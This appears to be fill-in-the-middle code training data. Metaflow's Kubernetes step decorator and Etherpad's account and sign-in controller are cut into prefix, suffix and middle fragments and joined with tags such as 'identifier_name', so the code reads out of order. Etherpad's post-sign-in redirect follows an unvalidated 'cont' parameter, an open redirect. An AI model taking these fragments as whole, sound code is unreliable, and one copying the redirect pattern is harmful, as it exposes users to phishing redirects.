raise KubernetesException(
"Could not import module 'kubernetes'.\n\nInstall Kubernetes "
"Python package (https://pypi.org/project/kubernetes/) first.\n"
"You can install the module by executing - "
"%s -m pip install kubernetes\n"
"or equivalent through your favorite Python package manager."
% sys.executable
)
def runtime_init(self, flow, graph, package, run_id):
# Set some more internal state.
self.flow = flow
self.graph = graph
self.package = package
self.run_id = run_id
def runtime_task_created(
self, task_datastore, task_id, split_index, input_paths, is_cloned, ubf_context
):
# To execute the Kubernetes job, the job container needs to have
# access to the code package. We store the package in the datastore
# which the pod is able to download as part of it's entrypoint.
if not is_cloned:
self._save_package_once(self.flow_datastore, self.package)
def runtime_step_cli(
self, cli_args, retry_count, max_user_code_retries, ubf_context
):
if retry_count <= max_user_code_retries:
# After all attempts to run the user code have failed, we don't need
# to execute on Kubernetes anymore. We can execute possible fallback
# code locally.
cli_args.commands = ["kubernetes", "step"]
cli_args.command_args.append(self.package_sha)
cli_args.command_args.append(self.package_url)
# --namespace is used to specify Metaflow namespace (a different
# concept from k8s namespace).
for k, v in self.attributes.items():
if k == "namespace":
cli_args.command_options["k8s_namespace"] = v
else:
cli_args.command_options[k] = v
cli_args.command_options["run-time-limit"] = self.run_time_limit
cli_args.entrypoint[0] = sys.executable
def task_pre_step(
self,
step_name,
task_datastore,
metadata,
run_id,
task_id,
flow,
graph,
retry_count,
max_retries,
ubf_context,
inputs,
):
self.metadata = metadata
self.task_datastore = task_datastore
# task_pre_step may run locally if fallback is activated for @catch
# decorator. In that scenario, we skip collecting Kubernetes execution
# metadata. A rudimentary way to detect non-local execution is to
# check for the existence of METAFLOW_KUBERNETES_WORKLOAD environment
# variable.
if "METAFLOW_KUBERNETES_WORKLOAD" in os.environ:
meta = {}
meta["kubernetes-pod-name"] = os.environ["METAFLOW_KUBERNETES_POD_NAME"]
meta["kubernetes-pod-namespace"] = os.environ[
"METAFLOW_KUBERNETES_POD_NAMESPACE"
]
meta["kubernetes-pod-id"] = os.environ["METAFLOW_KUBERNETES_POD_ID"]
meta["kubernetes-pod-service-account-name"] = os.environ[
"METAFLOW_KUBERNETES_SERVICE_ACCOUNT_NAME"
]
# Unfortunately, there doesn't seem to be any straight forward way right
# now to attach the Batch/v1 name - While we can rely on a hacky approach
# given we know that the pod name is simply a unique suffix with a hyphen
# delimiter to the Batch/v1 name - this approach will fail if the Batch/v1
# name is closer to 63 chars where the pod name will truncate the Batch/v1
# name.
# if "ARGO_WORKFLOW_NAME" not in os.environ:
# meta["kubernetes-job-name"] = os.environ[
# "METAFLOW_KUBERNETES_POD_NAME"
# ].rpartition("-")[0]
entries = [
MetaDatum(field=k, value=v, type=k, tags=[]) for k, v in meta.items()
]
# Register book-keeping metadata for debugging.
metadata.register_metadata(run_id, step_name, task_id, entries)
# Start MFLog sidecar to collect task logs.
self._save_logs_sidecar = SidecarSubProcess("save_logs_periodically")
def task_finished(
self, step_name, flow, graph, is_task_ok, retry_count, max_retries
):
# task_finished may run locally if fallback is activated for @catch
# decorator.
if "METAFLOW_KUBERNETES_WORKLOAD" in os.environ:
# If `local` metadata is configured, we would need to copy task
# execution metadata from the AWS Batch container to user's
# local file system after the user code has finished execution.
# This happens via datastore as a communication bridge.
# TODO: There is no guarantee that task_prestep executes before
# task_finished is invoked. That will result in AttributeError:
# 'KubernetesDecorator' object has no attribute 'metadata' error.
if self.metadata.TYPE == "local":
# Note that the datastore is *always* Amazon S3 (see
# runtime_task_created function).
sync_local_metadata_to_datastore(
DATASTORE_LOCAL_DIR, self.task_datastore
)
try:
self._save_logs_sidecar.kill()
except:
# Best effort kill
pass
@classmethod
def _save_package_once(cls, flow_datastore, package):
if cls.package_url is None:
cls.package_url, cls.package_sha = flow_datastore.save_data(
[package.blob], len_hint=1
)[0]
| step_init | identifier_name |
kubernetes_decorator.py | import os
import platform
import sys
import requests
from metaflow import util
from metaflow.decorators import StepDecorator
from metaflow.exception import MetaflowException
from metaflow.metadata import MetaDatum
from metaflow.metadata.util import sync_local_metadata_to_datastore
from metaflow.metaflow_config import (
DATASTORE_LOCAL_DIR,
KUBERNETES_CONTAINER_IMAGE,
KUBERNETES_CONTAINER_REGISTRY,
KUBERNETES_GPU_VENDOR,
KUBERNETES_NAMESPACE,
KUBERNETES_NODE_SELECTOR,
KUBERNETES_SERVICE_ACCOUNT,
)
from metaflow.plugins import ResourcesDecorator
from metaflow.plugins.timeout_decorator import get_run_time_limit_for_task
from metaflow.sidecar import SidecarSubProcess
from ..aws.aws_utils import get_docker_registry
from .kubernetes import KubernetesException
try:
unicode
except NameError:
unicode = str
basestring = str
class KubernetesDecorator(StepDecorator):
"""
Step decorator to specify that this step should execute on Kubernetes.
This decorator indicates that your step should execute on Kubernetes. Note
that you can apply this decorator automatically to all steps using the
```--with kubernetes``` argument when calling run/resume. Step level
decorators within the code are overrides and will force a step to execute
on Kubernetes regardless of the ```--with``` specification.
To use, annotate your step as follows:
```
@kubernetes
@step
def my_step(self):
...
```
Parameters
----------
cpu : int
Number of CPUs required for this step. Defaults to 1. If @resources is
also present, the maximum value from all decorators is used
memory : int
Memory size (in MB) required for this step. Defaults to 4096. If
@resources is also present, the maximum value from all decorators is
used
disk : int
Disk size (in MB) required for this step. Defaults to 10GB. If
@resources is also present, the maximum value from all decorators is
used
image : string
Docker image to use when launching on Kubernetes. If not specified, a
default docker image mapping to the current version of Python is used
"""
name = "kubernetes"
defaults = {
"cpu": "1",
"memory": "4096",
"disk": "10240",
"image": None,
"service_account": None,
"secrets": None, # e.g., mysecret
"node_selector": None, # e.g., kubernetes.io/os=linux
"namespace": None,
"gpu": None, # value of 0 implies that the scheduled node should not have GPUs
"gpu_vendor": None,
}
package_url = None
package_sha = None
run_time_limit = None
def __init__(self, attributes=None, statically_defined=False):
super(KubernetesDecorator, self).__init__(attributes, statically_defined)
if not self.attributes["namespace"]:
self.attributes["namespace"] = KUBERNETES_NAMESPACE
if not self.attributes["service_account"]:
self.attributes["service_account"] = KUBERNETES_SERVICE_ACCOUNT
if not self.attributes["gpu_vendor"]:
self.attributes["gpu_vendor"] = KUBERNETES_GPU_VENDOR
# TODO: Handle node_selector in a better manner. Currently it is special
# cased in kubernetes_client.py
# If no docker image is explicitly specified, impute a default image.
if not self.attributes["image"]:
# If metaflow-config specifies a docker image, just use that.
if KUBERNETES_CONTAINER_IMAGE:
self.attributes["image"] = KUBERNETES_CONTAINER_IMAGE
# If metaflow-config doesn't specify a docker image, assign a
# default docker image.
else:
# Default to vanilla Python image corresponding to major.minor
# version of the Python interpreter launching the flow.
self.attributes["image"] = "python:%s.%s" % (
platform.python_version_tuple()[0],
platform.python_version_tuple()[1],
)
# Assign docker registry URL for the image.
if not get_docker_registry(self.attributes["image"]):
if KUBERNETES_CONTAINER_REGISTRY:
self.attributes["image"] = "%s/%s" % (
KUBERNETES_CONTAINER_REGISTRY.rstrip("/"),
self.attributes["image"],
)
# Refer https://github.com/Netflix/metaflow/blob/master/docs/lifecycle.png
def step_init(self, flow, graph, step, decos, environment, flow_datastore, logger):
# Executing Kubernetes jobs requires a non-local datastore.
if flow_datastore.TYPE != "s3":
raise KubernetesException(
"The *@kubernetes* decorator requires --datastore=s3 at the moment."
)
# Set internal state.
self.logger = logger
self.environment = environment
self.step = step
self.flow_datastore = flow_datastore
if any([deco.name == "batch" for deco in decos]):
raise MetaflowException(
"Step *{step}* is marked for execution both on AWS Batch and "
"Kubernetes. Please use one or the other.".format(step=step)
)
for deco in decos:
if getattr(deco, "IS_PARALLEL", False):
raise KubernetesException(
"@kubernetes does not support parallel execution currently."
)
# Set run time limit for the Kubernetes job.
self.run_time_limit = get_run_time_limit_for_task(decos)
if self.run_time_limit < 60:
raise KubernetesException(
"The timeout for step *{step}* should be at least 60 seconds for "
"execution on Kubernetes.".format(step=step)
)
for deco in decos:
if isinstance(deco, ResourcesDecorator):
for k, v in deco.attributes.items():
# TODO: Special case GPUs when they are introduced in @resources.
if k in self.attributes:
if self.defaults[k] is None:
# skip if expected value isn't an int/float
continue
# We use the larger of @resources and @batch attributes
# TODO: Fix https://github.com/Netflix/metaflow/issues/467
my_val = self.attributes.get(k)
if not (my_val is None and v is None):
self.attributes[k] = str(
max(float(my_val or 0), float(v or 0))
)
# Check GPU vendor.
if self.attributes["gpu_vendor"].lower() not in ("amd", "nvidia"):
raise KubernetesException(
"GPU vendor *{}* for step *{step}* is not currently supported.".format(
self.attributes["gpu_vendor"], step=step
)
)
# CPU, Disk, and Memory values should be greater than 0.
for attr in ["cpu", "disk", "memory"]:
if not (
isinstance(self.attributes[attr], (int, unicode, basestring, float))
and float(self.attributes[attr]) > 0
):
raise KubernetesException(
"Invalid {} value *{}* for step *{step}*; it should be greater than 0".format(
attr, self.attributes[attr], step=step
)
)
if self.attributes["gpu"] is not None and not (
isinstance(self.attributes["gpu"], (int, unicode, basestring))
and float(self.attributes["gpu"]).is_integer()
):
raise KubernetesException(
"Invalid GPU value *{}* for step *{step}*; it should be an integer".format(
self.attributes["gpu"], step=step
)
)
def package_init(self, flow, step_name, environment):
try:
# Kubernetes is a soft dependency.
from kubernetes import client, config
except (NameError, ImportError):
raise KubernetesException(
"Could not import module 'kubernetes'.\n\nInstall Kubernetes "
"Python package (https://pypi.org/project/kubernetes/) first.\n"
"You can install the module by executing - "
"%s -m pip install kubernetes\n"
"or equivalent through your favorite Python package manager."
% sys.executable
)
def runtime_init(self, flow, graph, package, run_id):
# Set some more internal state.
self.flow = flow
self.graph = graph
self.package = package
self.run_id = run_id
def runtime_task_created(
self, task_datastore, task_id, split_index, input_paths, is_cloned, ubf_context
):
# To execute the Kubernetes job, the job container needs to have
# access to the code package. We store the package in the datastore
# which the pod is able to download as part of it's entrypoint.
|
def runtime_step_cli(
self, cli_args, retry_count, max_user_code_retries, ubf_context
):
if retry_count <= max_user_code_retries:
# After all attempts to run the user code have failed, we don't need
# to execute on Kubernetes anymore. We can execute possible fallback
# code locally.
cli_args.commands = ["kubernetes", "step"]
cli_args.command_args.append(self.package_sha)
cli_args.command_args.append(self.package_url)
# --namespace is used to specify Metaflow namespace (a different
# concept from k8s namespace).
for k, v in self.attributes.items():
if k == "namespace":
cli_args.command_options["k8s_namespace"] = v
else:
cli_args.command_options[k] = v
cli_args.command_options["run-time-limit"] = self.run_time_limit
cli_args.entrypoint[0] = sys.executable
def task_pre_step(
self,
step_name,
task_datastore,
metadata,
run_id,
task_id,
flow,
graph,
retry_count,
max_retries,
ubf_context,
inputs,
):
self.metadata = metadata
self.task_datastore = task_datastore
# task_pre_step may run locally if fallback is activated for @catch
# decorator. In that scenario, we skip collecting Kubernetes execution
# metadata. A rudimentary way to detect non-local execution is to
# check for the existence of METAFLOW_KUBERNETES_WORKLOAD environment
# variable.
if "METAFLOW_KUBERNETES_WORKLOAD" in os.environ:
meta = {}
meta["kubernetes-pod-name"] = os.environ["METAFLOW_KUBERNETES_POD_NAME"]
meta["kubernetes-pod-namespace"] = os.environ[
"METAFLOW_KUBERNETES_POD_NAMESPACE"
]
meta["kubernetes-pod-id"] = os.environ["METAFLOW_KUBERNETES_POD_ID"]
meta["kubernetes-pod-service-account-name"] = os.environ[
"METAFLOW_KUBERNETES_SERVICE_ACCOUNT_NAME"
]
# Unfortunately, there doesn't seem to be any straight forward way right
# now to attach the Batch/v1 name - While we can rely on a hacky approach
# given we know that the pod name is simply a unique suffix with a hyphen
# delimiter to the Batch/v1 name - this approach will fail if the Batch/v1
# name is closer to 63 chars where the pod name will truncate the Batch/v1
# name.
# if "ARGO_WORKFLOW_NAME" not in os.environ:
# meta["kubernetes-job-name"] = os.environ[
# "METAFLOW_KUBERNETES_POD_NAME"
# ].rpartition("-")[0]
entries = [
MetaDatum(field=k, value=v, type=k, tags=[]) for k, v in meta.items()
]
# Register book-keeping metadata for debugging.
metadata.register_metadata(run_id, step_name, task_id, entries)
# Start MFLog sidecar to collect task logs.
self._save_logs_sidecar = SidecarSubProcess("save_logs_periodically")
def task_finished(
self, step_name, flow, graph, is_task_ok, retry_count, max_retries
):
# task_finished may run locally if fallback is activated for @catch
# decorator.
if "METAFLOW_KUBERNETES_WORKLOAD" in os.environ:
# If `local` metadata is configured, we would need to copy task
# execution metadata from the AWS Batch container to user's
# local file system after the user code has finished execution.
# This happens via datastore as a communication bridge.
# TODO: There is no guarantee that task_prestep executes before
# task_finished is invoked. That will result in AttributeError:
# 'KubernetesDecorator' object has no attribute 'metadata' error.
if self.metadata.TYPE == "local":
# Note that the datastore is *always* Amazon S3 (see
# runtime_task_created function).
sync_local_metadata_to_datastore(
DATASTORE_LOCAL_DIR, self.task_datastore
)
try:
self._save_logs_sidecar.kill()
except:
# Best effort kill
pass
@classmethod
def _save_package_once(cls, flow_datastore, package):
if cls.package_url is None:
cls.package_url, cls.package_sha = flow_datastore.save_data(
[package.blob], len_hint=1
)[0]
| if not is_cloned:
self._save_package_once(self.flow_datastore, self.package) | identifier_body |
account_control.js | /**
* Copyright 2009 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS-IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import("stringutils");
import("stringutils.*");
import("funhtml.*");
import("email.sendEmail");
import("cache_utils.syncedWithCache");
import("etherpad.helpers");
import("etherpad.utils.*");
import("etherpad.sessions.getSession");
import("etherpad.pro.pro_accounts");
import("etherpad.pro.pro_accounts.getSessionProAccount");
import("etherpad.pro.domains");
import("etherpad.pro.pro_utils");
import("etherpad.pro.pro_account_auto_signin");
import("etherpad.pro.pro_config");
import("etherpad.pad.pad_security");
import("etherpad.pad.padutils");
import("etherpad.pad.padusers");
import("etherpad.collab.collab_server");
function onRequest() {
if (!getSession().tempFormData) {
getSession().tempFormData = {};
}
return false; // path not handled here
}
//--------------------------------------------------------------------------------
// helpers
//--------------------------------------------------------------------------------
function _redirOnError(m, clearQuery) {
if (m) {
getSession().accountFormError = m;
var dest = request.url;
if (clearQuery) {
dest = request.path;
}
response.redirect(dest);
}
}
function setSigninNotice(m) {
getSession().accountSigninNotice = m;
}
function setSessionError(m) {
getSession().accountFormError = m;
}
function _topDiv(id, name) {
var m = getSession()[name];
if (m) {
delete getSession()[name];
return DIV({id: id}, m);
} else {
return '';
}
}
function _messageDiv() { return _topDiv('account-message', 'accountMessage'); }
function _errorDiv() { return _topDiv('account-error', 'accountFormError'); }
function | () { return _topDiv('signin-notice', 'accountSigninNotice'); }
function _renderTemplate(name, data) {
data.messageDiv = _messageDiv;
data.errorDiv = _errorDiv;
data.signinNotice = _signinNoticeDiv;
data.tempFormData = getSession().tempFormData;
renderFramed('pro/account/'+name+'.ejs', data);
}
//----------------------------------------------------------------
// /ep/account/
//----------------------------------------------------------------
function render_main_get() {
_renderTemplate('my-account', {
account: getSessionProAccount(),
changePass: getSession().changePass
});
}
function render_update_info_get() {
response.redirect('/ep/account/');
}
function render_update_info_post() {
var fullName = request.params.fullName;
var email = trim(request.params.email);
getSession().tempFormData.email = email;
getSession().tempFormData.fullName = fullName;
_redirOnError(pro_accounts.validateEmail(email));
_redirOnError(pro_accounts.validateFullName(fullName));
pro_accounts.setEmail(getSessionProAccount(), email);
pro_accounts.setFullName(getSessionProAccount(), fullName);
getSession().accountMessage = "Info updated.";
response.redirect('/ep/account/');
}
function render_update_password_get() {
response.redirect('/ep/account/');
}
function render_update_password_post() {
var password = request.params.password;
var passwordConfirm = request.params.passwordConfirm;
if (password != passwordConfirm) { _redirOnError('Passwords did not match.'); }
_redirOnError(pro_accounts.validatePassword(password));
pro_accounts.setPassword(getSessionProAccount(), password);
if (getSession().changePass) {
delete getSession().changePass;
response.redirect('/');
}
getSession().accountMessage = "Password updated.";
response.redirect('/ep/account/');
}
//--------------------------------------------------------------------------------
// signin/signout
//--------------------------------------------------------------------------------
function render_sign_in_get() {
if (request.params.uid && request.params.tp) {
var m = pro_accounts.authenticateTempSignIn(Number(request.params.uid), request.params.tp);
if (m) {
getSession().accountFormError = m;
response.redirect('/ep/account/');
}
}
if (request.params.instantSigninKey) {
_attemptInstantSignin(request.params.instantSigninKey);
}
if (getSession().recentlySignedOut && getSession().accountFormError) {
delete getSession().accountFormError;
delete getSession().recentlySignedOut;
}
// Note: must check isAccountSignedIn before calling checkAutoSignin()!
if (pro_accounts.isAccountSignedIn()) {
_redirectToPostSigninDestination();
}
pro_account_auto_signin.checkAutoSignin();
var domainRecord = domains.getRequestDomainRecord();
var showGuestBox = false;
if (request.params.guest && request.params.padId) {
showGuestBox = true;
}
_renderTemplate('signin', {
domain: pro_utils.getFullProDomain(),
siteName: toHTML(pro_config.getConfig().siteName),
email: getSession().tempFormData.email || "",
password: getSession().tempFormData.password || "",
rememberMe: getSession().tempFormData.rememberMe || false,
showGuestBox: showGuestBox,
localPadId: request.params.padId
});
}
function _attemptInstantSignin(key) {
// See src/etherpad/control/global_pro_account_control.js
var email = null;
var password = null;
syncedWithCache('global_signin_passwords', function(c) {
if (c[key]) {
email = c[key].email;
password = c[key].password;
}
delete c[key];
});
getSession().tempFormData.email = email;
_redirOnError(pro_accounts.authenticateSignIn(email, password), true);
}
function render_sign_in_post() {
var email = trim(request.params.email);
var password = request.params.password;
getSession().tempFormData.email = email;
getSession().tempFormData.rememberMe = request.params.rememberMe;
_redirOnError(pro_accounts.authenticateSignIn(email, password));
pro_account_auto_signin.setAutoSigninCookie(request.params.rememberMe);
_redirectToPostSigninDestination();
}
function render_guest_sign_in_get() {
var localPadId = request.params.padId;
var domainId = domains.getRequestDomainId();
var globalPadId = padutils.makeGlobalId(domainId, localPadId);
var userId = padusers.getUserId();
pro_account_auto_signin.checkAutoSignin();
pad_security.clearKnockStatus(userId, globalPadId);
_renderTemplate('signin-guest', {
localPadId: localPadId,
errorMessage: getSession().guestAccessError,
siteName: toHTML(pro_config.getConfig().siteName),
guestName: padusers.getUserName() || ""
});
}
function render_guest_sign_in_post() {
function _err(m) {
if (m) {
getSession().guestAccessError = m;
response.redirect(request.url);
}
}
var displayName = request.params.guestDisplayName;
var localPadId = request.params.localPadId;
if (!(displayName && displayName.length > 0)) {
_err("Please enter a display name");
}
getSession().guestDisplayName = displayName;
response.redirect('/ep/account/guest-knock?padId='+encodeURIComponent(localPadId)+
"&guestDisplayName="+encodeURIComponent(displayName));
}
function render_guest_knock_get() {
var localPadId = request.params.padId;
helpers.addClientVars({
localPadId: localPadId,
guestDisplayName: request.params.guestDisplayName,
padUrl: "http://"+httpHost(request.host)+"/"+localPadId
});
_renderTemplate('guest-knock', {});
}
function render_guest_knock_post() {
var localPadId = request.params.padId;
var displayName = request.params.guestDisplayName;
var domainId = domains.getRequestDomainId();
var globalPadId = padutils.makeGlobalId(domainId, localPadId);
var userId = padusers.getUserId();
response.setContentType("text/plain; charset=utf-8");
// has the knock already been answsered?
var currentAnswer = pad_security.getKnockAnswer(userId, globalPadId);
if (currentAnswer) {
response.write(currentAnswer);
} else {
collab_server.guestKnock(globalPadId, userId, displayName);
response.write("wait");
}
}
function _redirectToPostSigninDestination() {
var cont = request.params.cont;
if (!cont) { cont = '/'; }
response.redirect(cont);
}
function render_sign_out() {
pro_account_auto_signin.setAutoSigninCookie(false);
pro_accounts.signOut();
delete getSession().padPasswordAuth;
getSession().recentlySignedOut = true;
response.redirect("/");
}
//--------------------------------------------------------------------------------
// create-admin-account (eepnet only)
//--------------------------------------------------------------------------------
function render_create_admin_account_get() {
if (pro_accounts.doesAdminExist()) {
renderFramedError("An admin account already exists on this domain.");
response.stop();
}
_renderTemplate('create-admin-account', {});
}
function render_create_admin_account_post() {
var email = trim(request.params.email);
var password = request.params.password;
var passwordConfirm = request.params.passwordConfirm;
var fullName = request.params.fullName;
getSession().tempFormData.email = email;
getSession().tempFormData.fullName = fullName;
if (password != passwordConfirm) { _redirOnError('Passwords did not match.'); }
_redirOnError(pro_accounts.validateEmail(email));
_redirOnError(pro_accounts.validateFullName(fullName));
_redirOnError(pro_accounts.validatePassword(password));
pro_accounts.createNewAccount(null, fullName, email, password, true);
var u = pro_accounts.getAccountByEmail(email, null);
// TODO: should we send a welcome email here?
//pro_accounts.sendWelcomeEmail(u);
_redirOnError(pro_accounts.authenticateSignIn(email, password));
response.redirect("/");
}
//--------------------------------------------------------------------------------
// forgot password
//--------------------------------------------------------------------------------
function render_forgot_password_get() {
if (request.params.instantSubmit && request.params.email) {
render_forgot_password_post();
} else {
_renderTemplate('forgot-password', {
email: getSession().tempFormData.email || ""
});
}
}
function render_forgot_password_post() {
var email = trim(request.params.email);
getSession().tempFormData.email = email;
var u = pro_accounts.getAccountByEmail(email, null);
if (!u) {
_redirOnError("Account not found: "+email);
}
var tempPass = stringutils.randomString(10);
pro_accounts.setTempPassword(u, tempPass);
var subj = "EtherPad: Request to reset your password on "+request.domain;
var body = renderTemplateAsString('pro/account/forgot-password-email.ejs', {
account: u,
recoverUrl: pro_accounts.getTempSigninUrl(u, tempPass)
});
var fromAddr = pro_utils.getEmailFromAddr();
sendEmail(u.email, fromAddr, subj, {}, body);
getSession().accountMessage = "An email has been sent to "+u.email+" with instructions to reset the password.";
response.redirect(request.path);
}
| _signinNoticeDiv | identifier_name |
account_control.js | /**
* Copyright 2009 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS-IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import("stringutils");
import("stringutils.*");
import("funhtml.*");
import("email.sendEmail");
import("cache_utils.syncedWithCache");
import("etherpad.helpers");
import("etherpad.utils.*");
import("etherpad.sessions.getSession");
import("etherpad.pro.pro_accounts");
import("etherpad.pro.pro_accounts.getSessionProAccount");
import("etherpad.pro.domains");
import("etherpad.pro.pro_utils");
import("etherpad.pro.pro_account_auto_signin");
import("etherpad.pro.pro_config");
import("etherpad.pad.pad_security");
import("etherpad.pad.padutils");
import("etherpad.pad.padusers");
import("etherpad.collab.collab_server");
function onRequest() {
if (!getSession().tempFormData) {
getSession().tempFormData = {};
}
return false; // path not handled here
}
//--------------------------------------------------------------------------------
// helpers
//--------------------------------------------------------------------------------
function _redirOnError(m, clearQuery) {
if (m) {
getSession().accountFormError = m;
var dest = request.url;
if (clearQuery) {
dest = request.path;
}
response.redirect(dest);
}
}
function setSigninNotice(m) {
getSession().accountSigninNotice = m;
}
function setSessionError(m) {
getSession().accountFormError = m;
}
function _topDiv(id, name) {
var m = getSession()[name];
if (m) {
delete getSession()[name];
return DIV({id: id}, m);
} else {
return '';
}
}
function _messageDiv() { return _topDiv('account-message', 'accountMessage'); }
function _errorDiv() { return _topDiv('account-error', 'accountFormError'); }
function _signinNoticeDiv() { return _topDiv('signin-notice', 'accountSigninNotice'); }
function _renderTemplate(name, data) {
data.messageDiv = _messageDiv;
data.errorDiv = _errorDiv;
data.signinNotice = _signinNoticeDiv;
data.tempFormData = getSession().tempFormData;
renderFramed('pro/account/'+name+'.ejs', data);
}
//----------------------------------------------------------------
// /ep/account/
//----------------------------------------------------------------
function render_main_get() {
_renderTemplate('my-account', {
account: getSessionProAccount(),
changePass: getSession().changePass
});
}
function render_update_info_get() {
response.redirect('/ep/account/');
}
function render_update_info_post() {
var fullName = request.params.fullName;
var email = trim(request.params.email);
getSession().tempFormData.email = email;
getSession().tempFormData.fullName = fullName;
_redirOnError(pro_accounts.validateEmail(email));
_redirOnError(pro_accounts.validateFullName(fullName));
pro_accounts.setEmail(getSessionProAccount(), email);
pro_accounts.setFullName(getSessionProAccount(), fullName);
getSession().accountMessage = "Info updated.";
response.redirect('/ep/account/');
}
function render_update_password_get() {
response.redirect('/ep/account/');
}
function render_update_password_post() {
var password = request.params.password;
var passwordConfirm = request.params.passwordConfirm;
if (password != passwordConfirm) { _redirOnError('Passwords did not match.'); }
_redirOnError(pro_accounts.validatePassword(password));
pro_accounts.setPassword(getSessionProAccount(), password);
if (getSession().changePass) {
delete getSession().changePass;
response.redirect('/');
}
getSession().accountMessage = "Password updated.";
response.redirect('/ep/account/');
}
//--------------------------------------------------------------------------------
// signin/signout
//--------------------------------------------------------------------------------
function render_sign_in_get() {
if (request.params.uid && request.params.tp) {
var m = pro_accounts.authenticateTempSignIn(Number(request.params.uid), request.params.tp);
if (m) {
getSession().accountFormError = m;
response.redirect('/ep/account/');
}
}
if (request.params.instantSigninKey) {
_attemptInstantSignin(request.params.instantSigninKey);
}
if (getSession().recentlySignedOut && getSession().accountFormError) {
delete getSession().accountFormError;
delete getSession().recentlySignedOut;
}
// Note: must check isAccountSignedIn before calling checkAutoSignin()!
if (pro_accounts.isAccountSignedIn()) {
_redirectToPostSigninDestination();
}
pro_account_auto_signin.checkAutoSignin();
var domainRecord = domains.getRequestDomainRecord();
var showGuestBox = false;
if (request.params.guest && request.params.padId) {
showGuestBox = true;
}
_renderTemplate('signin', {
domain: pro_utils.getFullProDomain(),
siteName: toHTML(pro_config.getConfig().siteName),
email: getSession().tempFormData.email || "",
password: getSession().tempFormData.password || "",
rememberMe: getSession().tempFormData.rememberMe || false,
showGuestBox: showGuestBox,
localPadId: request.params.padId
});
}
function _attemptInstantSignin(key) {
// See src/etherpad/control/global_pro_account_control.js
var email = null;
var password = null;
syncedWithCache('global_signin_passwords', function(c) {
if (c[key]) {
email = c[key].email;
password = c[key].password;
}
delete c[key];
});
getSession().tempFormData.email = email;
_redirOnError(pro_accounts.authenticateSignIn(email, password), true);
}
function render_sign_in_post() {
var email = trim(request.params.email);
var password = request.params.password;
getSession().tempFormData.email = email;
getSession().tempFormData.rememberMe = request.params.rememberMe;
_redirOnError(pro_accounts.authenticateSignIn(email, password));
pro_account_auto_signin.setAutoSigninCookie(request.params.rememberMe);
_redirectToPostSigninDestination();
}
function render_guest_sign_in_get() |
function render_guest_sign_in_post() {
function _err(m) {
if (m) {
getSession().guestAccessError = m;
response.redirect(request.url);
}
}
var displayName = request.params.guestDisplayName;
var localPadId = request.params.localPadId;
if (!(displayName && displayName.length > 0)) {
_err("Please enter a display name");
}
getSession().guestDisplayName = displayName;
response.redirect('/ep/account/guest-knock?padId='+encodeURIComponent(localPadId)+
"&guestDisplayName="+encodeURIComponent(displayName));
}
function render_guest_knock_get() {
var localPadId = request.params.padId;
helpers.addClientVars({
localPadId: localPadId,
guestDisplayName: request.params.guestDisplayName,
padUrl: "http://"+httpHost(request.host)+"/"+localPadId
});
_renderTemplate('guest-knock', {});
}
function render_guest_knock_post() {
var localPadId = request.params.padId;
var displayName = request.params.guestDisplayName;
var domainId = domains.getRequestDomainId();
var globalPadId = padutils.makeGlobalId(domainId, localPadId);
var userId = padusers.getUserId();
response.setContentType("text/plain; charset=utf-8");
// has the knock already been answsered?
var currentAnswer = pad_security.getKnockAnswer(userId, globalPadId);
if (currentAnswer) {
response.write(currentAnswer);
} else {
collab_server.guestKnock(globalPadId, userId, displayName);
response.write("wait");
}
}
function _redirectToPostSigninDestination() {
var cont = request.params.cont;
if (!cont) { cont = '/'; }
response.redirect(cont);
}
function render_sign_out() {
pro_account_auto_signin.setAutoSigninCookie(false);
pro_accounts.signOut();
delete getSession().padPasswordAuth;
getSession().recentlySignedOut = true;
response.redirect("/");
}
//--------------------------------------------------------------------------------
// create-admin-account (eepnet only)
//--------------------------------------------------------------------------------
function render_create_admin_account_get() {
if (pro_accounts.doesAdminExist()) {
renderFramedError("An admin account already exists on this domain.");
response.stop();
}
_renderTemplate('create-admin-account', {});
}
function render_create_admin_account_post() {
var email = trim(request.params.email);
var password = request.params.password;
var passwordConfirm = request.params.passwordConfirm;
var fullName = request.params.fullName;
getSession().tempFormData.email = email;
getSession().tempFormData.fullName = fullName;
if (password != passwordConfirm) { _redirOnError('Passwords did not match.'); }
_redirOnError(pro_accounts.validateEmail(email));
_redirOnError(pro_accounts.validateFullName(fullName));
_redirOnError(pro_accounts.validatePassword(password));
pro_accounts.createNewAccount(null, fullName, email, password, true);
var u = pro_accounts.getAccountByEmail(email, null);
// TODO: should we send a welcome email here?
//pro_accounts.sendWelcomeEmail(u);
_redirOnError(pro_accounts.authenticateSignIn(email, password));
response.redirect("/");
}
//--------------------------------------------------------------------------------
// forgot password
//--------------------------------------------------------------------------------
function render_forgot_password_get() {
if (request.params.instantSubmit && request.params.email) {
render_forgot_password_post();
} else {
_renderTemplate('forgot-password', {
email: getSession().tempFormData.email || ""
});
}
}
function render_forgot_password_post() {
var email = trim(request.params.email);
getSession().tempFormData.email = email;
var u = pro_accounts.getAccountByEmail(email, null);
if (!u) {
_redirOnError("Account not found: "+email);
}
var tempPass = stringutils.randomString(10);
pro_accounts.setTempPassword(u, tempPass);
var subj = "EtherPad: Request to reset your password on "+request.domain;
var body = renderTemplateAsString('pro/account/forgot-password-email.ejs', {
account: u,
recoverUrl: pro_accounts.getTempSigninUrl(u, tempPass)
});
var fromAddr = pro_utils.getEmailFromAddr();
sendEmail(u.email, fromAddr, subj, {}, body);
getSession().accountMessage = "An email has been sent to "+u.email+" with instructions to reset the password.";
response.redirect(request.path);
}
| {
var localPadId = request.params.padId;
var domainId = domains.getRequestDomainId();
var globalPadId = padutils.makeGlobalId(domainId, localPadId);
var userId = padusers.getUserId();
pro_account_auto_signin.checkAutoSignin();
pad_security.clearKnockStatus(userId, globalPadId);
_renderTemplate('signin-guest', {
localPadId: localPadId,
errorMessage: getSession().guestAccessError,
siteName: toHTML(pro_config.getConfig().siteName),
